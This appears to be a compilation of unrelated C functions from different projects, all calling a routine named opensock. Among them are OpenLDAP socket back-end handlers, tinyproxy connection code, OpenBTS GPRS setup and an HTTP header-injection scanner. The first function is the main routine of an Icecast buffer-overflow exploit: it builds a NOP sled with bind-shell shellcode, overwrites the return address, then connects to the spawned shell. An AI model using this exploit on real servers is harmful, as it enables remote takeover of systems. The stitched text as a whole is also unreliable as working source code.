int
main(int argc, char **argv)
{
char *string;
unsigned int size = 0, diff = 0, i;
int sock;
if(argc == 1) {
fprintf(stderr, "icx (2) ... proper version ... diz\n");
fprintf(stderr, "usage: %s <host> <icecast_port> [ <icecast_hostname> ]\n", argv[0]);
exit(1);
}
if(argc != 4)
diff = (strlen(ICECASTNAME)+strlen(argv[2]));
else
diff = (strlen(argv[3])+strlen(argv[2]));
size = (8198 - diff + 1);
string = malloc(size);
memset(string, 0x90, (size-8-strlen(bindcode)-1));
memcpy(string+(size-strlen(bindcode)-8-1), bindcode, strlen(bindcode));
*(long *)&string[size-9] = ONEHITWONDER;
*(long *)&string[size-5] = ONEHITWONDER;
string[size-1] = '\0';
if((sock = opensock(argv[1], atoi(argv[2]))) < 0 )
exit(1);
fsend(sock, "GET %s HTTP/1.0\n\n", string);
free(string);
close(sock);
// sploits need dots..everyone knows this...zzz
for(i = 0; i < SLEEP; i++) {
sleep(1);
fprintf(stderr, ".\n");
}
// check bindshell
if((sock = opensock(argv[1], 30464)) < 0 ) {
fprintf(stderr, "attack not succesfull\n");
exit(1);
}
fsend(sock, "%s\n", "id; uname -a");
handleshell(sock);
exit(0);
}
int
sock_back_unbind(
Operation *op,
SlapReply *rs
)
{
struct sockinfo *si = (struct sockinfo *) op->o_bd->be_private;
FILE *fp;
if ( (fp = opensock( si->si_sockpath )) == NULL ) {
send_ldap_error( op, rs, LDAP_OTHER,
"could not open socket" );
return( -1 );
}
/* write out the request to the unbind process */
fprintf( fp, "UNBIND\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
sock_print_suffixes( fp, op->o_bd );
fprintf( fp, "\n" );
/* no response to unbind */
fclose( fp );
return 0;
}
// NOTES: The sgsn uses UDP.
// It does not accept connections using listen() and accept().
// Rather it waits for a packet containing an NS_RESET message,
// then it remembers the IP&port from the IP header, (via recvfrom)
// for future communication with the BTS.
// BEGINCONFIG
// 'GPRS.SGSN.Host','127.0.0.1',0,0, 'IP address of the SGSN required for GPRS service. The default value is the localhost, ie, SGSN runs on same machine as OpenBTS.'
// 'GPRS.SGSN.port',1920,0,0,'Port number of the SGSN required for GPRS service. This must match the port specified in the SGSN config file, currently osmo_sgsn.cfg'
// ENDCONFIG
bool BSSGMain::BSSGOpen()
{
if (mbsIsOpen) return true;
// TODO: Look up the proper default sgsn port. Maybe 3386. See pat.txt
// Originally I specified the BSSG port, but now I let the O.S. pick
// a free port via connect() call.
//int bssgPort = gConfig.getNum("GPRS.BSSG.port",1921);
// Default BVCI to the first available value.
// The user may want to specify this some day far away.
mbsBVCI = BVCI::PTP;
int sgsnPort = gConfig.getNum("GPRS.SGSN.port");
std::string sgsnHost = gConfig.getStr("GPRS.SGSN.Host"); // Default: localhost
uint32_t sgsnIp = inet_addr(sgsnHost.c_str());
if (sgsnIp == INADDR_NONE) {
LOG(ERR) << "Config GPRS.SGSN.Host value is not a valid IP address: " << sgsnHost << "\n";
}
//mbsSGSockfd = openudp(sgsnIp,sgsnPort,bssgPort);
if (mbsSGSockfd < 0) {
mbsSGSockfd = opensock(sgsnIp,sgsnPort);
}
if (mbsSGSockfd < 0) {
LOG(ERR) << "Could not init BSSGP due to socket failure";
return false;
}
mbsBlocked = true;
mbsRecvThread.start(recvServiceLoop,this);
mbsSendThread.start(sendServiceLoop,this);
return BSSGReset();
}
void
list (int flag, int non_priv)
{
FILE *in = NULL;
FILE *out = NULL;
int socket = -1;
if (opensock (&socket, &in, &out))
{
client_type_t ctt = DBCTL;
fwrite (&ctt, sizeof (client_type_t), 1, out);
fflush (out);
DbCtlCommand command = { 0 };
command.command = LIST;
strcpy (command.parameter, "");
strcpy (command.options.username, "");
command.options.cpu = 0;
command.options.level = 0;
command.options.read = 0;
command.options.write = 0;
command.options.timeout = 0;
command.options.user_max_connections = 0;
fwrite_wrapper (&command, sizeof (DbCtlCommand), 1, out);
fflush (out);
print_list (in, flag, non_priv);
closesock (socket, in, out);
}
else
{
closesock (socket, in, out);
}
}
int
main(int argc, char *argv[])
{
const char *sockname = DEFAULT_SOCKET;
int ch;
while ((ch = getopt(argc, argv, ""))!=-1) {
switch (ch) {
default: usage();
}
}
if (optind < argc) {
sockname = argv[optind++];
}
if (optind < argc) {
usage();
}
senders = array_create();
if (!senders) {
fprintf(stderr, "hub161: Out of memory\n");
exit(1);
}
opensock(sockname);
printf("hub161: Listening on %s\n", sockname);
loop();
closesock();
return 0;
}
int setname(char *oldname, char *newname)
{
struct ifreq ifr;
opensock();
memset(&ifr,0,sizeof(struct ifreq));
strcpy(ifr.ifr_name, oldname);
strcpy(ifr.ifr_newname, newname);
return ioctl(ctl_sk, SIOCSIFNAME, &ifr);
}
int
sock_back_compare(
Operation *op,
SlapReply *rs )
{
struct sockinfo *si = (struct sockinfo *) op->o_bd->be_private;
AttributeDescription *entry = slap_schema.si_ad_entry;
Entry e;
FILE *fp;
char *text;
e.e_id = NOID;
e.e_name = op->o_req_dn;
e.e_nname = op->o_req_ndn;
e.e_attrs = NULL;
e.e_ocflags = 0;
e.e_bv.bv_len = 0;
e.e_bv.bv_val = NULL;
e.e_private = NULL;
if ( ! access_allowed( op, &e,
entry, NULL, ACL_COMPARE, NULL ) )
{
send_ldap_error( op, rs, LDAP_INSUFFICIENT_ACCESS, NULL );
return -1;
}
if ( (fp = opensock( si->si_sockpath )) == NULL ) {
send_ldap_error( op, rs, LDAP_OTHER,
"could not open socket" );
return( -1 );
}
/* write out the request to the compare process */
fprintf( fp, "COMPARE\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
sock_print_suffixes( fp, op->o_bd );
fprintf( fp, "dn: %s\n", op->o_req_dn.bv_val );
/* could be binary */
text = ldif_put_wrap( LDIF_PUT_VALUE,
op->orc_ava->aa_desc->ad_cname.bv_val,
op->orc_ava->aa_value.bv_val,
op->orc_ava->aa_value.bv_len, LDIF_LINE_WIDTH_MAX );
if ( text ) {
fprintf( fp, "%s\n", text );
ber_memfree( text );
} else {
fprintf( fp, "\n\n" );
}
/* read in the result and send it along */
sock_read_and_send_results( op, rs, fp );
fclose( fp );
return( 0 );
}
int getmac(char *name, unsigned char *mac)
{
int r;
struct ifreq ifr;
opensock();
memset(&ifr,0,sizeof(struct ifreq));
strcpy(ifr.ifr_name, name);
r = ioctl(ctl_sk, SIOCGIFHWADDR, &ifr);
memcpy(mac, ifr.ifr_hwaddr.sa_data, 6);
return r;
}
int
sock_back_modrdn(
Operation *op,
SlapReply *rs )
{
struct sockinfo *si = (struct sockinfo *) op->o_bd->be_private;
AttributeDescription *entry = slap_schema.si_ad_entry;
Entry e;
FILE *fp;
e.e_id = NOID;
e.e_name = op->o_req_dn;
e.e_nname = op->o_req_ndn;
e.e_attrs = NULL;
e.e_ocflags = 0;
e.e_bv.bv_len = 0;
e.e_bv.bv_val = NULL;
e.e_private = NULL;
if ( ! access_allowed( op, &e, entry, NULL,
op->oq_modrdn.rs_newSup ? ACL_WDEL : ACL_WRITE,
NULL ) )
{
send_ldap_error( op, rs, LDAP_INSUFFICIENT_ACCESS, NULL );
return -1;
}
if ( (fp = opensock( si->si_sockpath )) == NULL ) {
send_ldap_error( op, rs, LDAP_OTHER,
"could not open socket" );
return( -1 );
}
/* write out the request to the modrdn process */
fprintf( fp, "MODRDN\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
sock_print_suffixes( fp, op->o_bd );
fprintf( fp, "dn: %s\n", op->o_req_dn.bv_val );
fprintf( fp, "newrdn: %s\n", op->oq_modrdn.rs_newrdn.bv_val );
fprintf( fp, "deleteoldrdn: %d\n", op->oq_modrdn.rs_deleteoldrdn ? 1 : 0 );
if ( op->oq_modrdn.rs_newSup != NULL ) {
fprintf( fp, "newSuperior: %s\n", op->oq_modrdn.rs_newSup->bv_val );
}
fprintf( fp, "\n" );
/* read in the results and send them along */
sock_read_and_send_results( op, rs, fp );
fclose( fp );
return( 0 );
}
int
sock_back_bind(
Operation *op,
SlapReply *rs )
{
struct sockinfo *si = (struct sockinfo *) op->o_bd->be_private;
AttributeDescription *entry = slap_schema.si_ad_entry;
Entry e;
FILE *fp;
int rc;
e.e_id = NOID;
e.e_name = op->o_req_dn;
e.e_nname = op->o_req_ndn;
e.e_attrs = NULL;
e.e_ocflags = 0;
e.e_bv.bv_len = 0;
e.e_bv.bv_val = NULL;
e.e_private = NULL;
if ( ! access_allowed( op, &e,
entry, NULL, ACL_AUTH, NULL ) )
{
send_ldap_error( op, rs, LDAP_INSUFFICIENT_ACCESS, NULL );
return -1;
}
if ( (fp = opensock( si->si_sockpath )) == NULL ) {
send_ldap_error( op, rs, LDAP_OTHER,
"could not open socket" );
return( -1 );
}
/* write out the request to the bind process */
fprintf( fp, "BIND\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
sock_print_suffixes( fp, op->o_bd );
fprintf( fp, "dn: %s\n", op->o_req_dn.bv_val );
fprintf( fp, "method: %d\n", op->oq_bind.rb_method );
fprintf( fp, "credlen: %lu\n", op->oq_bind.rb_cred.bv_len );
fprintf( fp, "cred: %s\n", op->oq_bind.rb_cred.bv_val ); /* XXX */
fprintf( fp, "\n" );
/* read in the results and send them along */
rc = sock_read_and_send_results( op, rs, fp );
fclose( fp );
return( rc );
}
void sock4cookie(t_options *opt)
{
char* url=NULL;
char *receive=NULL;
unsigned int contentsize;
int size;
t_datathread *data=NULL;
int sock;
SSL *ssl= NULL;
data=malloc(sizeof(t_datathread));
EXIT_IFNULL(data, "Memory Error");
data->opt=*opt;
sock=opensock(data);
EXIT_IFNEG(sock, "Socket error");
if(data->opt.url.ssl && data->opt.proxy.ip != NULL)
{
prepare_connect(data, sock);
ssl=opensocks(sock, &data->opt);
}
else
{
if(data->opt.url.ssl)
ssl=opensocks(sock, &data->opt);
}
EXIT_IFNEG(catch_cookie(&url, data), "Too long url");
size = iosocket(sock, url, &receive, data->opt, ssl, &contentsize);
if(size == -1)
if(data->opt.debug)
fprintf(stderr, "\n");
EXIT_IFNEG(size, "can't read on socket");
get_cookie(receive, size, &data->opt);
*opt=data->opt;
if(data->opt.url.ssl)
closesocks(&ssl, sock);
else
close(sock);
FREE_BUF(data);
FREE_BUF(url);
FREE_BUF(receive);
}
struct vicc_ctx * vicc_init(const char *hostname, unsigned short port)
{
struct vicc_ctx *r = NULL;
struct vicc_ctx *ctx = malloc(sizeof *ctx);
if (!ctx) {
goto err;
}
ctx->hostname = NULL;
ctx->io_lock = NULL;
ctx->server_sock = -1;
ctx->client_sock = -1;
ctx->port = port;
#ifdef _WIN32
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
#endif
ctx->io_lock = create_lock();
if (!ctx->io_lock) {
goto err;
}
if (hostname) {
ctx->hostname = strdup(hostname);
if (!ctx->hostname) {
goto err;
}
ctx->client_sock = connectsock(hostname, port);
} else {
ctx->server_sock = opensock(port);
if (ctx->server_sock < 0) {
goto err;
}
}
r = ctx;
err:
if (!r) {
vicc_exit(ctx);
}
return r;
}
static
void
loop(void)
{
int s;
printf("stat161: Connecting...\n");
while (1) {
s = opensock();
if (s>=0) {
printf("stat161: Connected.\n");
reset();
dometer(s);
close(s);
printf("stat161: Disconnected.\n");
}
}
}
static int
sock_over_response( Operation *op, SlapReply *rs )
{
slap_overinst *on = (slap_overinst *)op->o_bd->bd_info;
struct sockinfo *si = (struct sockinfo *)on->on_bi.bi_private;
FILE *fp;
if ( rs->sr_type == REP_RESULT ) {
if ( !( si->si_resps & SOCK_REP_RESULT ))
return SLAP_CB_CONTINUE;
} else if ( rs->sr_type == REP_SEARCH ) {
if ( !( si->si_resps & SOCK_REP_SEARCH ))
return SLAP_CB_CONTINUE;
} else
return SLAP_CB_CONTINUE;
if (( fp = opensock( si->si_sockpath )) == NULL )
return SLAP_CB_CONTINUE;
if ( rs->sr_type == REP_RESULT ) {
/* write out the result */
fprintf( fp, "RESULT\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
fprintf( fp, "code: %d\n", rs->sr_err );
if ( rs->sr_matched )
fprintf( fp, "matched: %s\n", rs->sr_matched );
if (rs->sr_text )
fprintf( fp, "info: %s\n", rs->sr_text );
} else {
/* write out the search entry */
int len;
fprintf( fp, "ENTRY\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
ldap_pvt_thread_mutex_lock( &entry2str_mutex );
fprintf( fp, "%s", entry2str( rs->sr_entry, &len ) );
ldap_pvt_thread_mutex_unlock( &entry2str_mutex );
}
fprintf( fp, "\n" );
fclose( fp );
return SLAP_CB_CONTINUE;
}
int
sock_back_search(
Operation *op,
SlapReply *rs )
{
struct sockinfo *si = (struct sockinfo *) op->o_bd->be_private;
FILE *fp;
AttributeName *an;
if ( (fp = opensock( si->si_sockpath )) == NULL ) {
send_ldap_error( op, rs, LDAP_OTHER,
"could not open socket" );
return( -1 );
}
/* write out the request to the search process */
fprintf( fp, "SEARCH\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
sock_print_suffixes( fp, op->o_bd );
fprintf( fp, "base: %s\n", op->o_req_dn.bv_val );
fprintf( fp, "scope: %d\n", op->oq_search.rs_scope );
fprintf( fp, "deref: %d\n", op->oq_search.rs_deref );
fprintf( fp, "sizelimit: %d\n", op->oq_search.rs_slimit );
fprintf( fp, "timelimit: %d\n", op->oq_search.rs_tlimit );
fprintf( fp, "filter: %s\n", op->oq_search.rs_filterstr.bv_val );
fprintf( fp, "attrsonly: %d\n", op->oq_search.rs_attrsonly ? 1 : 0 );
fprintf( fp, "attrs:%s", op->oq_search.rs_attrs == NULL ? " all" : "" );
for ( an = op->oq_search.rs_attrs; an && an->an_name.bv_val; an++ ) {
fprintf( fp, " %s", an->an_name.bv_val );
}
fprintf( fp, "\n\n" ); /* end of attr line plus blank line */
/* read in the results and send them along */
rs->sr_attrs = op->oq_search.rs_attrs;
sock_read_and_send_results( op, rs, fp );
fclose( fp );
return( 0 );
}
int
sock_back_add(
Operation *op,
SlapReply *rs )
{
struct sockinfo *si = (struct sockinfo *) op->o_bd->be_private;
AttributeDescription *entry = slap_schema.si_ad_entry;
FILE *fp;
int len;
if ( ! access_allowed( op, op->oq_add.rs_e,
entry, NULL, ACL_WADD, NULL ) )
{
send_ldap_error( op, rs, LDAP_INSUFFICIENT_ACCESS, NULL );
return -1;
}
if ( (fp = opensock( si->si_sockpath )) == NULL ) {
send_ldap_error( op, rs, LDAP_OTHER,
"could not open socket" );
return( -1 );
}
/* write out the request to the add process */
fprintf( fp, "ADD\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
sock_print_suffixes( fp, op->o_bd );
ldap_pvt_thread_mutex_lock( &entry2str_mutex );
fprintf( fp, "%s", entry2str( op->oq_add.rs_e, &len ) );
ldap_pvt_thread_mutex_unlock( &entry2str_mutex );
fprintf (fp, "\n" );
/* read in the result and send it along */
sock_read_and_send_results( op, rs, fp );
fclose( fp );
return( 0 );
}
/* Given host and port, send request to server, receive response
and send data back to client */
void get(char *h, char *p, int cfd){
int sock;
sock=opensock(h); //get connected to socket
char *buffer = malloc(1024);
printf("\n");
sprintf(buffer, "GET %s HTTP/1.0\r\n\r\n", p);
/*buffer = orig;*/
int ret=0;
int sent=0;
/* Send request to web server */
do{
ret=send(sock, buffer+sent, strlen(buffer+sent), 0);
sent=sent+ret;
} while(sent<strlen(buffer));
int ret1=0;
int bufsize=100000;
int received=0;
char *buffer1=malloc(bufsize);
/* Receive content from web server*/
do{
ret1=recv(sock, buffer1+received, bufsize-received, 0);
received = received + ret1;
}while(ret1!=0);
/* Send content to client */
send(cfd, buffer1, received, 0);
free(buffer);
free(buffer1);
}
int inject_header(
char **ressource,
t_datathread *data,
char *word1,
int sock,
SSL *ssl)
{
char url[MAX_SIZE_URL];
memset(url, 0, MAX_SIZE_URL);
char *auth=NULL;
char *receive=NULL;
unsigned int cl;
int i=0, size;
time_t start_time, stop_time;
int delay;
t_response response;
t_cookies local_cook=data->opt.cookies;
bool dontup=false;
const char *Header[]= { "Cookie", "Host", "User-Agent", "Accept", "Accept-Language",
"Accept-Encoding", "Accept-Charset", "Keep-Alive",
"Connection", "Referer", NULL
};
while(Header[i] != NULL || local_cook!=NULL)
{
if(data->opt.method != NULL && strlen(data->opt.method)< (MAX_SIZE_URL-2))
{
strncpy(url, data->opt.method, strlen(data->opt.method));
url[strlen(data->opt.method)]=' ';
url[strlen(data->opt.method)+1]='\0';
}
else
{
strncpy(url, "GET ", 4);
url[4]='\0';
}
add_proxy_header(data, url);
if( (strlen(url)+strlen(data->opt.url.url_pre))>MAX_SIZE_URL)
return(-2);
strncat(url,data->opt.url.url_pre, strlen(data->opt.url.url_pre));
if(!checkhost(data->opt.head, data->opt.headers) && strcasecmp(Header[i],"Host")!=0)
{
if( (strlen(url) + 17 + strlen(data->opt.url.host) + 2 + 1)> MAX_SIZE_URL)
return(-2);
strncat(url," HTTP/1.1\r\nHost: ", 17);
strncat(url,data->opt.url.host, strlen(data->opt.url.host));
strncat(url,"\r\n", 2);
}
else
{
if((strlen(url) + 12)> MAX_SIZE_URL)
return(-2);
strncat(url," HTTP/1.1\r\n", 11);
}
if(data->opt.headers != NULL)
{
if( (strlen(url) + strlen(data->opt.headers) + 1 ) > MAX_SIZE_URL)
return(-2);
strncat(url, data->opt.headers, strlen(data->opt.headers));
}
if( (strlen(url) + strlen(Header[i]) + 5 +strlen(word1)) > MAX_SIZE_URL)
return(-2);
strcat(url, Header[i]);
strcat(url, ": ");
if(local_cook!=NULL)
{
if( (strlen(url) + strlen(local_cook->cookie) +3+strlen(word1)) > MAX_SIZE_URL)
return(-2);
strcat(url, local_cook->cookie);
local_cook=local_cook->next_cook;
dontup=true;
}
else
dontup=false;
if(strcasecmp(Header[i], "Host") ==0
&& (strlen(url) + strlen(data->opt.url.host) )<MAX_SIZE_URL)
strcat(url, data->opt.url.host);
strncat(url, word1, strlen(word1));
strcat(url, "\r\n");
if(data->opt.auth.user!=NULL && data->opt.auth.pass!=NULL)
{
auth=basic_authent(data->opt.auth.user, data->opt.auth.pass);
if( (strlen(url) +21+ strlen(auth) +2+1 ) > MAX_SIZE_URL)
return(-2);
strcat(url, "Authorization: Basic ");
strcat(url, auth);
strcat(url, "\r\n");
FREE_BUF(auth);
}
if ( (strlen(url) +3) > MAX_SIZE_URL)
return(-2);
strncat(url,"\r\n", 2);
start_time=time(NULL);
size = iosocket(sock, url, &receive, data->opt, ssl, &cl);
stop_time=time(NULL);
delay= stop_time-start_time;
if(size == -1)
{
if(data->opt.debug)
fprintf(stderr, "\n Read on socket ");
continue;
}
response_inject(receive, size, cl, &response, &(data->opt), Header[i], word1, delay);
memset(url, 0, MAX_SIZE_URL);
sleep(data->opt.wait);
if(data->opt.url.ssl)
{
closesocks(&ssl, sock);
sock=opensock(data);
if(data->opt.proxy.ip != NULL)
prepare_connect(data, sock);
ssl=opensocks(sock, &data->opt);
}
else
{
close(sock);
sock=opensock(data);
}
if(!dontup)
i++;
}
FREE_BUF(receive);
return(1);
}
/*
* Establish a connection to the upstream proxy server.
*/
static int
connect_to_upstream(struct conn_s *connptr, struct request_s *request)
{
#ifndef UPSTREAM_SUPPORT
/*
* This function does nothing if upstream support was not compiled
* into tinyproxy.
*/
return -1;
#else
char *combined_string;
int len;
struct upstream *cur_upstream = connptr->upstream_proxy;
if(!cur_upstream) {
log_message(LOG_WARNING,
"No upstream proxy defined for %s.",
request->host);
indicate_http_error(connptr, 404, "Unable to connect to upstream proxy.");
return -1;
}
connptr->server_fd =
opensock(cur_upstream->host, cur_upstream->port);
if (connptr->server_fd < 0) {
log_message(LOG_WARNING,
"Could not connect to upstream proxy.");
indicate_http_error(connptr, 404, "Unable to connect to upstream proxy",
"detail", "A network error occurred while trying to connect to the upstream web proxy.",
NULL);
return -1;
}
log_message(LOG_CONN,
"Established connection to upstream proxy \"%s\" using file descriptor %d.",
cur_upstream->host, connptr->server_fd);
/*
* We need to re-write the "path" part of the request so that we
* can reuse the establish_http_connection() function. It expects a
* method and path.
*/
if (connptr->connect_method) {
len = strlen(request->host) + 7;
combined_string = safemalloc(len);
if (!combined_string) {
return -1;
}
snprintf(combined_string, len, "%s:%d", request->host,
request->port);
} else {
len = strlen(request->host) + strlen(request->path) + 14;
combined_string = safemalloc(len);
if (!combined_string) {
return -1;
}
snprintf(combined_string, len, "http://%s:%d%s", request->host,
request->port, request->path);
}
if (request->path)
safefree(request->path);
request->path = combined_string;
return establish_http_connection(connptr, request);
#endif
}
/*
* This is the main drive for each connection. As you can tell, for the
* first few steps we are using a blocking socket. If you remember the
* older tinyproxy code, this use to be a very confusing state machine.
* Well, no more! :) The sockets are only switched into nonblocking mode
* when we start the relay portion. This makes most of the original
* tinyproxy code, which was confusing, redundant. Hail progress.
* - rjkaes
*/
void
handle_connection(int fd)
{
struct conn_s *connptr;
struct request_s *request = NULL;
hashmap_t hashofheaders = NULL;
char peer_ipaddr[PEER_IP_LENGTH];
char peer_string[PEER_STRING_LENGTH];
getpeer_information(fd, peer_ipaddr, peer_string);
log_message(LOG_CONN, "Connect (file descriptor %d): %s [%s]",
fd, peer_string, peer_ipaddr);
connptr = initialize_conn(fd, peer_ipaddr, peer_string);
if (!connptr) {
close(fd);
return;
}
if (check_acl(fd, peer_ipaddr, peer_string) <= 0) {
update_stats(STAT_DENIED);
indicate_http_error(connptr, 403, "Access denied",
"detail", "The administrator of this proxy has not configured it to service requests from your host.",
NULL);
send_http_error_message(connptr);
destroy_conn(connptr);
return;
}
if (read_request_line(connptr) < 0) {
update_stats(STAT_BADCONN);
indicate_http_error(connptr, 408, "Timeout",
"detail", "Server timeout waiting for the HTTP request from the client.",
NULL);
send_http_error_message(connptr);
destroy_conn(connptr);
return;
}
/*
* The "hashofheaders" store the client's headers.
*/
if (!(hashofheaders = hashmap_create(HEADER_BUCKETS))) {
update_stats(STAT_BADCONN);
indicate_http_error(connptr, 503, "Internal error",
"detail", "An internal server error occurred while processing your request. Please contact the administrator.",
NULL);
send_http_error_message(connptr);
destroy_conn(connptr);
return;
}
/*
* Get all the headers from the client in a big hash.
*/
if (get_all_headers(connptr->client_fd, hashofheaders) < 0) {
log_message(LOG_WARNING, "Could not retrieve all the headers from the client");
hashmap_delete(hashofheaders);
update_stats(STAT_BADCONN);
destroy_conn(connptr);
return;
}
request = process_request(connptr, hashofheaders);
if (!request) {
if (!connptr->error_variables && !connptr->show_stats) {
update_stats(STAT_BADCONN);
destroy_conn(connptr);
hashmap_delete(hashofheaders);
return;
}
goto send_error;
}
connptr->upstream_proxy = UPSTREAM_HOST(request->host);
if (connptr->upstream_proxy != NULL) {
if (connect_to_upstream(connptr, request) < 0) {
goto send_error;
}
} else {
connptr->server_fd = opensock(request->host, request->port);
if (connptr->server_fd < 0) {
indicate_http_error(connptr, 500, "Unable to connect",
"detail", PACKAGE " was unable to connect to the remote web server.",
"error", strerror(errno),
NULL);
goto send_error;
}
log_message(LOG_CONN,
"Established connection to host \"%s\" using file descriptor %d.",
request->host, connptr->server_fd);
if (!connptr->connect_method)
establish_http_connection(connptr, request);
}
send_error:
free_request_struct(request);
if (process_client_headers(connptr, hashofheaders) < 0) {
update_stats(STAT_BADCONN);
if (!connptr->error_variables) {
hashmap_delete(hashofheaders);
destroy_conn(connptr);
return;
}
}
hashmap_delete(hashofheaders);
if (connptr->error_variables) {
send_http_error_message(connptr);
destroy_conn(connptr);
return;
} else if (connptr->show_stats) {
showstats(connptr);
destroy_conn(connptr);
return;
}
if (!connptr->connect_method || (connptr->upstream_proxy != NULL)) {
if (process_server_headers(connptr) < 0) {
if (connptr->error_variables)
send_http_error_message(connptr);
update_stats(STAT_BADCONN);
destroy_conn(connptr);
return;
}
} else {
if (send_ssl_response(connptr) < 0) {
log_message(LOG_ERR,
"handle_connection: Could not send SSL greeting to client.");
update_stats(STAT_BADCONN);
destroy_conn(connptr);
return;
}
}
relay_connection(connptr);
log_message(LOG_INFO, "Closed connection between local client (fd:%d) and remote client (fd:%d)",
connptr->client_fd, connptr->server_fd);
/*
* All done... close everything and go home... :)
*/
destroy_conn(connptr);
return;
}
int
sock_back_modify(
Operation *op,
SlapReply *rs )
{
Modification *mod;
struct sockinfo *si = (struct sockinfo *) op->o_bd->be_private;
AttributeDescription *entry = slap_schema.si_ad_entry;
Modifications *ml = op->orm_modlist;
Entry e;
FILE *fp;
int i;
e.e_id = NOID;
e.e_name = op->o_req_dn;
e.e_nname = op->o_req_ndn;
e.e_attrs = NULL;
e.e_ocflags = 0;
e.e_bv.bv_len = 0;
e.e_bv.bv_val = NULL;
e.e_private = NULL;
if ( ! access_allowed( op, &e,
entry, NULL, ACL_WRITE, NULL ) )
{
send_ldap_error( op, rs, LDAP_INSUFFICIENT_ACCESS, NULL );
return -1;
}
if ( (fp = opensock( si->si_sockpath )) == NULL ) {
send_ldap_error( op, rs, LDAP_OTHER,
"could not open socket" );
return( -1 );
}
/* write out the request to the modify process */
fprintf( fp, "MODIFY\n" );
fprintf( fp, "msgid: %ld\n", (long) op->o_msgid );
sock_print_conn( fp, op->o_conn, si );
sock_print_suffixes( fp, op->o_bd );
fprintf( fp, "dn: %s\n", op->o_req_dn.bv_val );
for ( ; ml != NULL; ml = ml->sml_next ) {
mod = &ml->sml_mod;
/* FIXME: should use LDIF routines to deal with binary data */
switch ( mod->sm_op ) {
case LDAP_MOD_ADD:
fprintf( fp, "add: %s\n", mod->sm_desc->ad_cname.bv_val );
break;
case LDAP_MOD_DELETE:
fprintf( fp, "delete: %s\n", mod->sm_desc->ad_cname.bv_val );
break;
case LDAP_MOD_REPLACE:
fprintf( fp, "replace: %s\n", mod->sm_desc->ad_cname.bv_val );
break;
}
if( mod->sm_values != NULL ) {
for ( i = 0; mod->sm_values[i].bv_val != NULL; i++ ) {
fprintf( fp, "%s: %s\n", mod->sm_desc->ad_cname.bv_val,
mod->sm_values[i].bv_val /* binary! */ );
}
}
fprintf( fp, "-\n" );
}
fprintf( fp, "\n" );
/* read in the results and send them along */
sock_read_and_send_results( op, rs, fp );
fclose( fp );
return( 0 );
}
int processsocket(int sock,int inpipe) {
fd_set fdset; /* selected file descriptors */
int poll,i;
struct timeval tv;
sigset_t set;
struct sigaction act;
sigemptyset(&set);
sigaddset(&set,SIGUSR1);
act.sa_flags=0;
act.sa_mask=set;
act.sa_handler=trapreset;
sigaction(SIGUSR1,&act,NULL);
signal(SIGPIPE,SIG_IGN);
listen(sock,5);
tv.tv_sec=0;
tv.tv_usec=0;
poll=0;
runloop=1;
do {
FD_ZERO(&fdset);
FD_SET(inpipe,&fdset);
if (poll==0) {
if (pollsock(sock,NULL,&fdset) !=0) continue;
} else pollsock(sock,&tv,&fdset);
/* open any new connections if possible */
opensock(sock,&fdset);
poll=0;
/* check to see if the root server has sent any data */
if (FD_ISSET(inpipe,&fdset)) {
int size;
size=read(inpipe,mbuf,BUF_SIZE);
if (size==0) break;
/* log the time */
logtime(timefname,size);
writeraw(mbuf,size);
}
/* send the data to the clients */
if (writesock() !=0) poll=1;
/* read back any data from the clients */
readsock(&fdset,tmpbuf,BUF_SIZE);
/* decode the buffers here */
} while(runloop);
/* close all the clients down */
for (i=0; i<msgmax; i++) {
if (client[i].sock !=0) close(client[i].sock);
}
close(sock);
return -1;
}